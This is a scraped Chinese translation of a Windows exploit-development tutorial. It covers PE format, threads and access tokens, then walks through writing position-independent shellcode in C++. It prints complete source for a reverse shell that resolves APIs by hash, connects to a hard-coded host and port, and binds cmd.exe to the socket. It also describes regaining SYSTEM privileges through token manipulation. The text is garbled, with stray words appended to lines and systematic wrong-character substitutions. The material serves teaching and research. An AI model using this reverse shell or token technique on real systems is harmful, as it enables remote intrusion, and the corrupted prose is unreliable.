Exploit開發系列教程-Windows基礎&shellcode

時間 2019-11-21

標籤 exploit 開發系列教程 windows 基礎 shellcode 欄目 Windows 简体版

原文原文鏈接

P3nro5e · 2015/09/17 22:21python

from:http://expdev-kiuhnm.rhcloud.com/2015/05/11/contents/c++

Windows基礎

0x00 Windows Basics

這篇文章簡要講述Windows開發者應該瞭解的一些常識。git

0x01 Win32 API

Windows的主要API由多個DLLs（Dynamic Link Libraries）提供。某個應用能夠從那些DLL中導入函數而且對它們進行調用。這樣就保證了普通用戶態應用程序的可移植性。github

0x02 PE文件格式

執行體和DLL都是PE(Portable Executable)文件。每一個PE含有一個導入和導出表。導入表指定導入函數以及這些函數所在的文件（模塊）。導出表指定導出函數，等等。函數能夠被導入到其它的PE文件。shell

PE文件由多個節（section）組成（代碼節，數據節，等等…）。在內存中， .reloc節中具備重定位可執行體或DLL的信息。在內存中，雖然有些代碼（例如相對的jmp指令）的地址是相對的，可是多數代碼所在的地址是絕對的，這取決於被加載的模塊。windows

Windows loader從當前工做目錄開始搜索DLLs，發佈的某個應用可能具備一個不一樣於系統根（\windows\system32）目錄中的DLL。該版本方面的問題（不兼容）被一些人稱做DLL-hell。數組

重要的是理解相對虛擬內存地址 (Relative Virtual Address，RVA)的概念。PE文件提供RVAs來指定模塊的相對基地址。換句話說，在內存中，若是某個模塊在地址B（基地址）上被加載而且某個元素在該模塊中具備RVA 爲X這一偏移量，那麼該元素的虛擬內存地址（Virtual Address，VA）偏移量爲B+X。安全

0x03 線程

若是你過去常用Windows平臺，那麼應該很是瞭解線程的概念。可是，若是你常用的是Linux，那麼請記住，Windows平臺將會爲線程提供CPU時間片。你能夠用CreateProcess()建立新進程而且用CreateThreads()建立新線程。線程會在它們所在進程的地址空間內執行，所以它們所在的內存是共享的。服務器

線程也會被一種稱做TLS（Thread Local Storage）的機制限制，該機制爲線程提供了非共享內存。數據結構

基本上，每一個線程的TEB都含有一個TLS數組，它具備64個DWORD值，而且在運行過程當中超出TLS數組的有效元素個數時，會爲額外的TLS數組分配1024個DWORD值。首先，兩個數組中的一個數組的每一個元素會對應一個索引值，該索引值必須被分配或使用TlsAlloc()來獲得，能夠用TlsGetValue(index) 來讀取DWORD 值並用TlsSetValue(index, newValue)將其寫入。如，在當前線程的TEB中，TlsGetValue(7)表示從TLS數組中索引值爲7的地址上讀取DWORD值。

筆記：咱們能夠經過使用GetCurrentThreadId()來模擬該機制，可是不會有同樣的效果。

0x04 令牌

令牌一般用於描述訪問權限。就像文件句柄那樣，令牌僅僅是一個32位整數。每一個進程具備一個內部結構，該結構含有關於訪問權限的信息，它與令牌相關聯。

令牌分爲兩種類型：主令牌和模仿令牌。不管什麼時候，某個進程被建立後都會被分配一個主令牌。進程的每一個線程均可以擁有進程的令牌，或從另外一進程中獲取模仿令牌。若是LogonUser()函數被調用，則會返回一個不能被使用於CreateProcessAsUser()的模仿令牌（提供憑據），除非你調用了DupcateTokenEx來將其轉換爲主令牌。

可使用SetThreadToken(newToken) 將某個令牌附加到當前線程而且可使用RevertToSelf()來將該令牌刪除，從而讓線程的令牌還原爲主令牌。

咱們來了解下在Windows平臺上，將某個用戶鏈接到服務器併發送用戶名和密碼的狀況。首先以SYSTEM身份運行服務器，將會調用具備憑據的LogonUser()，若是成功則返回新令牌。接着會在服務器建立新線程的同時調用SetThreadToken(new_token)，new_token參數是一個由 LogonUser()返回的令牌值。這樣，線程被執行時就具備與用戶同樣的權限。當線程完成了對客戶端的服務時，或者會被銷燬，或者將調用revertToSelf() 而被添加到線程池的空閒線程隊列中。

若是能夠控制服務器，那麼可經過調用RevertToSelf()，或在內存中查找其它的令牌並使用SetThreadToken()函數將它們附加到當前線程，從而恢復當前線程的權限，即SYSTEM權限。

值得注意的是，CreateProcess()使用主令牌做爲新進程的令牌。當具備比主令牌更高權限的模仿令牌的線程調用CreateProcess()時存在一個問題，那就是新進程的權限會低於建立該進程的線程。

解決方案是使用DuplicateTokenEx()從當前線程的模擬令牌中建立一個新的主令牌，接着經過調用具備新的主令牌的CreateProcessAsUser() 建立新進程。

shellcode

0x00 介紹

Shellcode是一段被exploit做爲payload發送的代碼，它被注入到存在漏洞的應用，而且會被執行。Shellcode是自包含的，而且應該不含有null字節。一般使用函數如strcpy()來複制shellcode，在進行該複製過程當中遇到null字節時，將中止複製。這樣作會致使shellcode不能被徹底複製。 Shellcode通常直接由彙編語言編寫，可是，在這篇文章中，咱們將經過Visual Studio 2013使用c/c++來開發shellcode。在該開發環境下進行開發的好處以下：

1.花費更短的開發時間。

2.智能提示（intellisense）。

3.易於調試。

咱們將使用VS2013來生成一個具備shellcode的執行體，也將使用python腳原本提取並修復（移除null字節）shellcode。

0x01 C/C++ 代碼

僅僅使用棧變量

爲了編寫浮動地址代碼（position independent code），咱們必須使用棧變量。這意味着咱們不能這麼寫。

char *v = new char[100];
複製代碼

由於那數組將被分配到棧。根據絕對地址，試着從msvcr120.dll 中調用new函數：

00191000 6A 64                push        64h
00191002 FF 15 90 20 19 00    call        dword ptr ds:[192090h]
複製代碼

地址192090h上包含函數的地址。在沒有依賴導入表以及Windows loader的狀況下，要調用某庫中已導入的函數，咱們必須直接這麼作。另外一個存在的問題是，新操做符可能須要某種經過c/c++語言編寫的運行時組件來完成的初始化操做。

不能使用全局變量：

int x;
 
int main() {
  x = 12;
}
複製代碼

上面的代碼 (若是沒有被優化)生成以下：

008E1C7E C7 05 30 91 8E 00 0C 00 00 00 mov         dword ptr ds:[8E9130h],0Ch
複製代碼

地址8E9130h爲變量x的絕對地址。

若是咱們編寫以下，會致使字符串存在問題

char str[] = "I'm a string";

printf(str);
複製代碼

字符串將被放入執行體的.rdata節中，而且會對其進行絕對地址引用。

在shellcode中不得使用printf：這只是一個瞭解str如何被引用的範例。

這是asm代碼：

00A71006 8D 45 F0             lea         eax,[str]
00A71009 56                   push        esi
00A7100A 57                   push        edi
00A7100B BE 00 21 A7 00       mov         esi,0A72100h
00A71010 8D 7D F0             lea         edi,[str]
00A71013 50                   push        eax
00A71014 A5                   movs        dword ptr es:[edi],dword ptr [esi]
00A71015 A5                   movs        dword ptr es:[edi],dword ptr [esi]
00A71016 A5                   movs        dword ptr es:[edi],dword ptr [esi]
00A71017 A4                   movs        byte ptr es:[edi],byte ptr [esi]
00A71018 FF 15 90 20 A7 00    call        dword ptr ds:[0A72090h]
複製代碼

正如你所看到的，字符串位於.rdata節中，地址爲A72100h，經過movsd和movsb指令的執行，它會被複制進棧（str指向棧）。注意：A72100h爲絕對地址。顯然該代碼不是地址無關的。

若是咱們這樣寫：

char *str = "I'm a string";
printf(str);
複製代碼

那麼字符串仍然會被放入.data節，但不會被複制進棧：

00A31000 68 00 21 A3 00       push        0A32100h
00A31005 FF 15 90 20 A3 00    call        dword ptr ds:[0A32090h]
複製代碼

字符串在.rdata節中，絕對地址爲A32100h。

如何讓該代碼地址無關?

更簡單的（部分）解決方案：

char str[] = { 'I', '\'', 'm', ' ', 'a', ' ', 's', 't', 'r', 'i', 'n', 'g', '\0' };
printf(str);
複製代碼

對應的彙編代碼以下：

012E1006 8D 45 F0             lea         eax,[str]
012E1009 C7 45 F0 49 27 6D 20 mov         dword ptr [str],206D2749h
012E1010 50                   push        eax
012E1011 C7 45 F4 61 20 73 74 mov         dword ptr [ebp-0Ch],74732061h
012E1018 C7 45 F8 72 69 6E 67 mov         dword ptr [ebp-8],676E6972h
012E101F C6 45 FC 00          mov         byte ptr [ebp-4],0
012E1023 FF 15 90 20 2E 01    call        dword ptr ds:[12E2090h]
複製代碼

除了對printf的調用外，該段代碼是地址無關的，由於字符串部分被直接編碼進了mov指令的源操做數中。一旦該字符串在棧上，則能夠被使用。

不幸的是，當字符串達到必定長度時，該方法就失效了。代碼爲：

char str[] = { 'I', '\'', 'm', ' ', 'a', ' ', 'v', 'e', 'r', 'y', ' ', 'l', 'o', 'n', 'g', ' ', 's', 't', 'r', 'i', 'n', 'g', '\0' };
printf(str);
複製代碼

生成

013E1006 66 0F 6F 05 00 21 3E 01 movdqa      xmm0,xmmword ptr ds:[13E2100h]
013E100E 8D 45 E8             lea         eax,[str]
013E1011 50                   push        eax
013E1012 F3 0F 7F 45 E8       movdqu      xmmword ptr [str],xmm0
013E1017 C7 45 F8 73 74 72 69 mov         dword ptr [ebp-8],69727473h
013E101E 66 C7 45 FC 6E 67    mov         word ptr [ebp-4],676Eh
013E1024 C6 45 FE 00          mov         byte ptr [ebp-2],0
013E1028 FF 15 90 20 3E 01    call        dword ptr ds:[13E2090h]
複製代碼

正如你所看到的，當字符串的其它部分像以前那樣被編碼進mov指令的源操做數中時，字符串部分將被定位在.rdata節中，地址爲13E2100h。

我已提出的解決方案以下：

char *str = "I'm a very long string";
複製代碼

同時使用Python腳本修復shellcode。該腳本須要從.rdata節中提取被引用的字符串，並將它們放入到shellcode中，而後修復重定位信息。咱們立刻會了解到該實現方法。

不直接調用Windows API

在C/C++代碼中，咱們不能編寫

WaitForSingleObject(procInfo.hProcess, INFINITE);
複製代碼

由於kernel32.dll中已導入了「WaitForSingleObject」函數。

在nutshell中，PE文件含有導入表和導入地址表（IAT）。導入表含有被導入到庫中的函數的信息。當執行體被加載時，經過Windows loader編譯IAT，而且其含有已導入的函數地址。該執行體的代碼用間接尋址調用已導入到庫中的函數。例如：

001D100B FF 15 94 20 1D 00    call        dword ptr ds:[1D2094h]
複製代碼

地址1D2094h爲入口地址（在IAT中），該地址含有函數 MessageBoxA的地址。由於如上調用函數的地址無需被修復（除非執行體被重定位），因此能夠直接使用該地址。Windows loader 只須要修復的是在1D2094h地址，該dword值是MessageBoxA函數的地址。

解決方案是直接從Windows的數據結構中獲得Windows的函數地址。以後咱們將會了解到。

建立新項目

經過 File→New→Project…, 選擇 Installed→Templates→Visual C++→Win32→Win32 Console Application, 爲項目命名 (我將其命名爲 shellcode) 接着點擊OK。

經過 Project→<project name> properties 將出現新會話框。經過將 Configuration（會話的左上方）設置爲All Configurations將修改應用到全部配置（Release和Debug）。接着，展開Configuration Properties而且在General 下修改Platform Toolset 。該編譯器爲Visual C++ Compiler Nov 2013 CTP (CTP_Nov2013)。

這樣你將可使用C++11和C++14的一些特性，如static_assert。

Shellcode範例

這是一段簡單的反向shell代碼（定義）。將命名爲shellcode.cpp的文件添加到項目中並將該代碼複製到shellcode.cpp。不要試圖理解全部的代碼。後面咱們還會對其進行進一步的討論。

// Simple reverse shell shellcode by Massimiliano Tomassoli (2015)
// NOTE: Compiled on Visual Studio 2013 + "Visual C++ Compiler November 2013 CTP".
 
#include <WinSock2.h>               // must preceed #include <windows.h>
#include <WS2tcpip.h>
#include <windows.h>
#include <winnt.h>
#include <winternl.h>
#include <stddef.h>
#include <stdio.h>
 
#define htons(A) ((((WORD)(A) & 0xff00) >> 8) | (((WORD)(A) & 0x00ff) << 8))
 
_inline PEB *getPEB() {
    PEB *p;
    __asm {
        mov     eax, fs:[30h]
        mov     p, eax
    }
    return p;
}
 
DWORD getHash(const char *str) {
    DWORD h = 0;
    while (*str) {
        h = (h >> 13) | (h << (32 - 13));       // ROR h, 13
        h += *str >= 'a' ? *str - 32 : *str;    // convert the character to uppercase
        str++;
    }
    return h;
}
 
DWORD getFunctionHash(const char *moduleName, const char *functionName) {
    return getHash(moduleName) + getHash(functionName);
}
 
LDR_DATA_TABLE_ENTRY *getDataTableEntry(const LIST_ENTRY *ptr) {
    int list_entry_offset = offsetof(LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
    return (LDR_DATA_TABLE_ENTRY *)((BYTE *)ptr - list_entry_offset);
}
 
// NOTE: This function doesn't work with forwarders. For instance, kernel32.ExitThread forwards to
//       ntdll.RtlExitUserThread. The solution is to follow the forwards manually.
PVOID getProcAddrByHash(DWORD hash) {
    PEB *peb = getPEB();
    LIST_ENTRY *first = peb->Ldr->InMemoryOrderModuleList.Flink;
    LIST_ENTRY *ptr = first;
    do {                            // for each module
        LDR_DATA_TABLE_ENTRY *dte = getDataTableEntry(ptr);
        ptr = ptr->Flink;
 
        BYTE *baseAddress = (BYTE *)dte->DllBase;
        if (!baseAddress)           // invalid module(???)
            continue;
        IMAGE_DOS_HEADER *dosHeader = (IMAGE_DOS_HEADER *)baseAddress;
        IMAGE_NT_HEADERS *ntHeaders = (IMAGE_NT_HEADERS *)(baseAddress + dosHeader->e_lfanew);
        DWORD iedRVA = ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
        if (!iedRVA)                // Export Directory not present
            continue;
        IMAGE_EXPORT_DIRECTORY *ied = (IMAGE_EXPORT_DIRECTORY *)(baseAddress + iedRVA);
        char *moduleName = (char *)(baseAddress + ied->Name);
        DWORD moduleHash = getHash(moduleName);
 
        // The arrays pointed to by AddressOfNames and AddressOfNameOrdinals run in parallel, i.e. the i-th
        // element of both arrays refer to the same function. The first array specifies the name whereas
        // the second the ordinal. This ordinal can then be used as an index in the array pointed to by
        // AddressOfFunctions to find the entry point of the function.
        DWORD *nameRVAs = (DWORD *)(baseAddress + ied->AddressOfNames);
        for (DWORD i = 0; i < ied->NumberOfNames; ++i) {
            char *functionName = (char *)(baseAddress + nameRVAs[i]);
            if (hash == moduleHash + getHash(functionName)) {
                WORD ordinal = ((WORD *)(baseAddress + ied->AddressOfNameOrdinals))[i];
                DWORD functionRVA = ((DWORD *)(baseAddress + ied->AddressOfFunctions))[ordinal];
                return baseAddress + functionRVA;
            }
        }
    } while (ptr != first);
 
    return NULL;            // address not found
}
 
#define HASH_LoadLibraryA           0xf8b7108d
#define HASH_WSAStartup             0x2ddcd540
#define HASH_WSACleanup             0x0b9d13bc
#define HASH_WSASocketA             0x9fd4f16f
#define HASH_WSAConnect             0xa50da182
#define HASH_CreateProcessA         0x231cbe70
#define HASH_inet_ntoa              0x1b73fed1
#define HASH_inet_addr              0x011bfae2
#define HASH_getaddrinfo            0xdc2953c9
#define HASH_getnameinfo            0x5c1c856e
#define HASH_ExitThread             0x4b3153e0
#define HASH_WaitForSingleObject    0xca8e9498
 
#define DefineFuncPtr(name)     decltype(name) *My_##name = (decltype(name) *)getProcAddrByHash(HASH_##name)
 
int entryPoint() {
//  printf("0x%08x\n", getFunctionHash("kernel32.dll", "WaitForSingleObject"));
//  return 0;
 
    // NOTE: we should call WSACleanup() and freeaddrinfo() (after getaddrinfo()), but
    //       they're not strictly needed.
 
    DefineFuncPtr(LoadLibraryA);
 
    My_LoadLibraryA("ws2_32.dll");
 
    DefineFuncPtr(WSAStartup);
    DefineFuncPtr(WSASocketA);
    DefineFuncPtr(WSAConnect);
    DefineFuncPtr(CreateProcessA);
    DefineFuncPtr(inet_ntoa);
    DefineFuncPtr(inet_addr);
    DefineFuncPtr(getaddrinfo);
    DefineFuncPtr(getnameinfo);
    DefineFuncPtr(ExitThread);
    DefineFuncPtr(WaitForSingleObject);
 
    const char *hostName = "127.0.0.1";
    const int hostPort = 123;
 
    WSADATA wsaData;
 
    if (My_WSAStartup(MAKEWORD(2, 2), &wsaData))
        goto __end;         // error
    SOCKET sock = My_WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
    if (sock == INVALID_SOCKET)
        goto __end;
 
    addrinfo *result;
    if (My_getaddrinfo(hostName, NULL, NULL, &result))
        goto __end;
    char ip_addr[16];
    My_getnameinfo(result->ai_addr, result->ai_addrlen, ip_addr, sizeof(ip_addr), NULL, 0, NI_NUMERICHOST);
 
    SOCKADDR_IN remoteAddr;
    remoteAddr.sin_family = AF_INET;
    remoteAddr.sin_port = htons(hostPort);
    remoteAddr.sin_addr.s_addr = My_inet_addr(ip_addr);
 
    if (My_WSAConnect(sock, (SOCKADDR *)&remoteAddr, sizeof(remoteAddr), NULL, NULL, NULL, NULL))
        goto __end;
 
    STARTUPINFOA sInfo;
    PROCESS_INFORMATION procInfo;
    SecureZeroMemory(&sInfo, sizeof(sInfo));        // avoids a call to _memset
    sInfo.cb = sizeof(sInfo);
    sInfo.dwFlags = STARTF_USESTDHANDLES;
    sInfo.hStdInput = sInfo.hStdOutput = sInfo.hStdError = (HANDLE)sock;
    My_CreateProcessA(NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &sInfo, &procInfo);
 
    // Waits for the process to finish.
    My_WaitForSingleObject(procInfo.hProcess, INFINITE);
 
__end:
    My_ExitThread(0);
 
    return 0;
}
 
int main() {
    return entryPoint();
}
複製代碼

編譯器配置

經過Project→<project name> properties, 展開 Configuration Properties 接着選擇 C/C++。應用修改後的Release 配置。

這裏是須要修改的設置：

General:
- oSDL Checks: No (/sdl-)

這可能並不須要，可是我已將它們關閉了。

Optimization:
- Optimization: Minimize Size (/O1)

這很重要！咱們得儘量將shellcode簡短。

* Inline Function Expansion: Only __inline (/Ob1)
複製代碼

使用這個設置告訴VS 2013只用_inline來定義內聯函數。 main() 僅調用shellcode的函數entryPoint。若是函數 entryPoint是簡短的，那麼它可能會被內聯進main()。這將是極糟的，由於main()將再也不透露shellcode的後一部分（事實上它包含了該部分）。後面會了解到緣由。

* Enable Intrinsic Functions: Yes (/Oi)
複製代碼

我不知道該設置是否應該關閉。

* Favor Size Or Speed: Favor small code (/Os)

* Whole Program Optimization: Yes (/GL)
複製代碼

Code Generation:
- Security Check: Disable Security Check (/GS-)

不須要安全檢查!

* Enable Function-Level linking: Yes (/Gy)
複製代碼

linker配置

經過Project→<project name> properties, 展開Configuration Properties接着查看Linker。應用修改後的Release配置。這裏是你須要修改的相關設置：

General:
- Enable Incremental Linking: No (/INCREMENTAL:NO)
Debugging:
- Generate Map File: Yes (/MAP)

告訴linker生成含有EXE結構的映射文件。

* Map File Name: mapfile
複製代碼

這是映射文件名。可自定義文件名。

Optimization:
- References: Yes (/OPT:REF)

該選項對於生成簡短的shellcode來講很是重要，由於能夠除去函數以及不被代碼引用的數據。

* Enable COMDAT Folding: Yes (/OPT:ICF)

* Function Order: function_order.txt
複製代碼

應用該設置讀取命名爲function_order.txt 的文件，該文件指定必須出如今代碼節中函數的順序。咱們要將函數 entryPoint變爲代碼節中的第一個函數，可想而知，function_order.txt中必存在一行代碼含有字符串?entryPoint@@YAHXZ。能夠在映射文件中找到該函數名。

getProcAddrByHash

該函數返回由某個出如今內存中的模塊（.exe或.dll）導出的某個函hash數的地址，已給出的``值與模塊和函數相關聯。固然，經過名字查找函數具備必定的可能性，可是這樣作須要考慮空間方面的問題，由於那些名字應該被包含在shellcode中。在另外一方面，一個hash僅有4個字節。由於咱們不使用兩個hash（一個用於模塊，一個用於函數），getProcAddrByHash須要考慮全部被加載進內存中的模塊。

經過user32.dll導出函數MessageBoxA，該函數的hash值可經過以下方法計算：

DWORD hash = getFunctionHash("user32.dll", "MessageBoxA");
複製代碼

計算出的hash值爲getHash(「user32.dll」) 與getHash(「MessageBoxA」)的hash值的總和。函數getHash的實現簡明易懂：

DWORD getHash(const char *str) {
    DWORD h = 0;
    while (*str) {
        h = (h >> 13) | (h << (32 - 13));       // ROR h, 13
        h += *str >= 'a' ? *str - 32 : *str;    // convert the character to uppercase
        str++;
    }
    return h;
}
複製代碼

正如你能夠了解到的，hash值是大小寫不敏感的（不區分大小寫），重要的是，由於在內存中，某種Windows的版本所使用的字符串都爲大寫。首先，getProcAddrByHash獲取TEB(Thread Environment Block)的地址：

PEB *peb = getPEB();

where

_inline PEB *getPEB() {
    PEB *p;
    __asm {
        mov     eax, fs:[30h]
        mov     p, eax
    }
    return p;
}
複製代碼

選擇子fs與某個始於TEB地址的段相關聯。在偏移30h上，TEB含有一個PEB(Process Environment Block)指針。用WinDbg能夠觀察到：

0:000> dt _TEB @$teb
ntdll!_TEB
+0x000 NtTib            : _NT_TIB
+0x01c EnvironmentPointer : (null)
+0x020 ClientId         : _CLIENT_ID
+0x028 ActiveRpcHandle  : (null)
+0x02c ThreadLocalStoragePointer : 0x7efdd02c Void
+0x030 ProcessEnvironmentBlock : 0x7efde000 _PEB
+0x034 LastErrorValue   : 0
+0x038 CountOfOwnedCriticalSections : 0
+0x03c CsrClientThread  : (null)
<snip>
複製代碼

PEB與當前的進程相關聯，除了別的之外，含有關於某些模塊的信息，這些模塊都被加載到進程地址空間中。此處又是getProcAddrByHash：

PVOID getProcAddrByHash(DWORD hash) {
    PEB *peb = getPEB();
    LIST_ENTRY *first = peb->Ldr->InMemoryOrderModuleList.Flink;
    LIST_ENTRY *ptr = first;
    do {                            // for each module
        LDR_DATA_TABLE_ENTRY *dte = getDataTableEntry(ptr);
        ptr = ptr->Flink;
        .
        .
        .
    } while (ptr != first);
 
    return NULL;            // address not found
}
複製代碼

此處爲PEB部分:

0:000> dt _PEB @$peb
ntdll!_PEB
   +0x000 InheritedAddressSpace : 0 ''
   +0x001 ReadImageFileExecOptions : 0 ''
   +0x002 BeingDebugged    : 0x1 ''
   +0x003 BitField         : 0x8 ''
   +0x003 ImageUsesLargePages : 0y0
   +0x003 IsProtectedProcess : 0y0
   +0x003 IsLegacyProcess  : 0y0
   +0x003 IsImageDynamicallyRelocated : 0y1
   +0x003 SkipPatchingUser32Forwarders : 0y0
   +0x003 SpareBits        : 0y000
   +0x004 Mutant           : 0xffffffff Void
   +0x008 ImageBaseAddress : 0x00060000 Void
   +0x00c Ldr              : 0x76fd0200 _PEB_LDR_DATA
   +0x010 ProcessParameters : 0x00681718 _RTL_USER_PROCESS_PARAMETERS
   +0x014 SubSystemData    : (null)
   +0x018 ProcessHeap      : 0x00680000 Void
   <snip>
複製代碼

在偏移0Ch上，是一個被稱做Ldr的字段，它是個PEB_LDR_DATA 結構指針。使用WinDbg進行觀察：

0:000> dt _PEB_LDR_DATA 0x76fd0200
ntdll!_PEB_LDR_DATA
   +0x000 Length           : 0x30
   +0x004 Initialized      : 0x1 ''
   +0x008 SsHandle         : (null)
   +0x00c InLoadOrderModuleList : _LIST_ENTRY [ 0x683080 - 0x6862c0 ]
   +0x014 InMemoryOrderModuleList : _LIST_ENTRY [ 0x683088 - 0x6862c8 ]
   +0x01c InInitializationOrderModuleList : _LIST_ENTRY [ 0x683120 - 0x6862d0 ]
   +0x024 EntryInProgress  : (null)
   +0x028 ShutdownInProgress : 0 ''
   +0x02c ShutdownThreadId : (null)
複製代碼

InMemoryOrderModuleList是一個LDR_DATA_TABLE_ENTRY結構的雙鏈表，它與當前進程的地址空間中所加載的模塊相關聯。更確切地說，InMemoryOrderModuleList 是一個LIST_ENTRY，它含有兩個部分：

0:000> dt _LIST_ENTRY
ntdll!_LIST_ENTRY
+0x000 Flink            : Ptr32 _LIST_ENTRY
+0x004 Blink            : Ptr32 _LIST_ENTRY
複製代碼

Flink爲前向鏈表，Blink爲後向鏈表。Flink指向第一個模塊的LDR_DATA_TABLE_ENTRY 。固然，未必就是如此：

Flink指向一個被包含在結構LDR_DATA_TABLE_ENTRY中的LIST_ENTRY 結構。

咱們來觀察LDR_DATA_TABLE_ENTRY 是如何被定義的:

0:000> dt _LDR_DATA_TABLE_ENTRY
ntdll!_LDR_DATA_TABLE_ENTRY
+0x000 InLoadOrderLinks : _LIST_ENTRY
+0x008 InMemoryOrderLinks : _LIST_ENTRY
+0x010 InInitializationOrderLinks : _LIST_ENTRY
+0x018 DllBase          : Ptr32 Void
+0x01c EntryPoint       : Ptr32 Void
+0x020 SizeOfImage      : Uint4B
+0x024 FullDllName      : _UNICODE_STRING
+0x02c BaseDllName      : _UNICODE_STRING
+0x034 Flags            : Uint4B
+0x038 LoadCount        : Uint2B
+0x03a TlsIndex         : Uint2B
+0x03c HashLinks        : _LIST_ENTRY
+0x03c SectionPointer   : Ptr32 Void
+0x040 CheckSum         : Uint4B
+0x044 TimeDateStamp    : Uint4B
+0x044 LoadedImports    : Ptr32 Void
+0x048 EntryPointActivationContext : Ptr32 _ACTIVATION_CONTEXT
+0x04c PatchInformation : Ptr32 Void
+0x050 ForwarderLinks   : _LIST_ENTRY
+0x058 ServiceTagLinks  : _LIST_ENTRY
+0x060 StaticLinks      : _LIST_ENTRY
+0x068 ContextInformation : Ptr32 Void
+0x06c OriginalBase     : Uint4B
+0x070 LoadTime         : _LARGE_INTEGER
複製代碼

InMemoryOrderModuleList.Flink指向位於偏移爲8的_LDR_DATA_TABLE_ENTRY.InMemoryOrderLinks，所以，咱們必須減去8來獲取 _LDR_DATA_TABLE_ENTRY的地址。

首先，獲取Flink指針:

+0x00c InLoadOrderModuleList : _LIST_ENTRY [ 0x683080 - 0x6862c0 ]
複製代碼

它的值是0x683080，所以_LDR_DATA_TABLE_ENTRY 結構的地址爲0x683080 – 8 = 0x683078:

0:000> dt _LDR_DATA_TABLE_ENTRY 683078
ntdll!_LDR_DATA_TABLE_ENTRY
   +0x000 InLoadOrderLinks : _LIST_ENTRY [ 0x359469e5 - 0x1800eeb1 ]
   +0x008 InMemoryOrderLinks : _LIST_ENTRY [ 0x683110 - 0x76fd020c ]
   +0x010 InInitializationOrderLinks : _LIST_ENTRY [ 0x683118 - 0x76fd0214 ]
   +0x018 DllBase          : (null)
   +0x01c EntryPoint       : (null)
   +0x020 SizeOfImage      : 0x60000
   +0x024 FullDllName      : _UNICODE_STRING "蒮ｍ쿟ﾹ엘ﾬ膪ｎ???"
   +0x02c BaseDllName      : _UNICODE_STRING "C:\Windows\SysWOW64\calc.exe"
   +0x034 Flags            : 0x120010
   +0x038 LoadCount        : 0x2034
   +0x03a TlsIndex         : 0x68
   +0x03c HashLinks        : _LIST_ENTRY [ 0x4000 - 0xffff ]
   +0x03c SectionPointer   : 0x00004000 Void
   +0x040 CheckSum         : 0xffff
   +0x044 TimeDateStamp    : 0x6841b4
   +0x044 LoadedImports    : 0x006841b4 Void
   +0x048 EntryPointActivationContext : 0x76fd4908 _ACTIVATION_CONTEXT
   +0x04c PatchInformation : 0x4ce7979d Void
   +0x050 ForwarderLinks   : _LIST_ENTRY [ 0x0 - 0x0 ]
   +0x058 ServiceTagLinks  : _LIST_ENTRY [ 0x6830d0 - 0x6830d0 ]
   +0x060 StaticLinks      : _LIST_ENTRY [ 0x6830d8 - 0x6830d8 ]
   +0x068 ContextInformation : 0x00686418 Void
   +0x06c OriginalBase     : 0x6851a8
   +0x070 LoadTime         : _LARGE_INTEGER 0x76f0c9d0
複製代碼

正如你能夠看到的，我正在用WinDbg調試calc.exe！不錯：第一個模塊是執行體自己。重要的是DLLBase (c)字段。根據給出的模塊的基地址，咱們能夠分析被加載到內存中的PE文件並獲取全部信息，如已導出的函數地址。在getProcAddrByHash中咱們所作的:

BYTE *baseAddress = (BYTE *)dte->DllBase;
    if (!baseAddress)           // invalid module(???)
        continue;
    IMAGE_DOS_HEADER *dosHeader = (IMAGE_DOS_HEADER *)baseAddress;
    IMAGE_NT_HEADERS *ntHeaders = (IMAGE_NT_HEADERS *)(baseAddress + dosHeader->e_lfanew);
    DWORD iedRVA = ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
    if (!iedRVA)                // Export Directory not present
        continue;
    IMAGE_EXPORT_DIRECTORY *ied = (IMAGE_EXPORT_DIRECTORY *)(baseAddress + iedRVA);
    char *moduleName = (char *)(baseAddress + ied->Name);
    DWORD moduleHash = getHash(moduleName);
 
    // The arrays pointed to by AddressOfNames and AddressOfNameOrdinals run in parallel, i.e. the i-th
    // element of both arrays refer to the same function. The first array specifies the name whereas
    // the second the ordinal. This ordinal can then be used as an index in the array pointed to by
    // AddressOfFunctions to find the entry point of the function.
    DWORD *nameRVAs = (DWORD *)(baseAddress + ied->AddressOfNames);
    for (DWORD i = 0; i < ied->NumberOfNames; ++i) {
        char *functionName = (char *)(baseAddress + nameRVAs[i]);
        if (hash == moduleHash + getHash(functionName)) {
            WORD ordinal = ((WORD *)(baseAddress + ied->AddressOfNameOrdinals))[i];
            DWORD functionRVA = ((DWORD *)(baseAddress + ied->AddressOfFunctions))[ordinal];
            return baseAddress + functionRVA;
        }
    }
    .
    .
    .
複製代碼

瞭解PE文件格式的規範能夠更好地理解該段代碼，這裏不詳細講解。在PE文件結構中須要注意的是RVA(Relative Virtual Addresses)。即相對於PE模塊（Dllbase）中基地址的地址。例如，若是RVA是100h而且DllBase是400000h，那麼指向數據的RVA爲400000h + 100h = 400100h。該模塊始於DOS_HEADER 。它包含一個NT_HEADERS的RVA(e_lfanew)。FILE_HEADER和OPTIONAL_HEADERNT_HEADERS存在於NT_HEADERS。 OPTIONAL_HEADER含有一個被稱做DataDirectory的數組，該數組指向PE模塊的多個目錄。瞭解Export Directory可參考連接msdn.microsoft.com/en-us/libra…中提到的相關細節。

以下C結構體與Export Directory相關聯，其定義以下：

typedef struct _IMAGE_EXPORT_DIRECTORY {
    DWORD   Characteristics;
    DWORD   TimeDateStamp;
    WORD    MajorVersion;
    WORD    MinorVersion;
    DWORD   Name;
    DWORD   Base;
    DWORD   NumberOfFunctions;
    DWORD   NumberOfNames;
    DWORD   AddressOfFunctions;     // RVA from base of image
    DWORD   AddressOfNames;         // RVA from base of image
    DWORD   AddressOfNameOrdinals;  // RVA from base of image
} IMAGE_EXPORT_DIRECTORY, *PIMAGE_EXPORT_DIRECTORY;
複製代碼

DefineFuncPtr

DefineFuncPtr 是一個宏，它有助於定義一個已導入的函數指針. 這是範例:

#define HASH_WSAStartup           0x2ddcd540
 
#define DefineFuncPtr(name)       decltype(name) *My_##name = (decltype(name) *)getProcAddrByHash(HASH_##name)
 
DefineFuncPtr(WSAStartup);
複製代碼

WSAStartup函數是ws2_32.dll中已導入的函數，所以經過該方法計算HASH_WSAStartup

DWORD hash = getFunctionHash("ws2_32.dll", "WSAStartup");
複製代碼

當宏被展開時,

DefineFuncPtr(WSAStartup);
複製代碼

變爲

decltype(WSAStartup) *My_WSAStartup = (decltype(WSAStartup) *)getProcAddrByHash(HASH_WSAStartup)
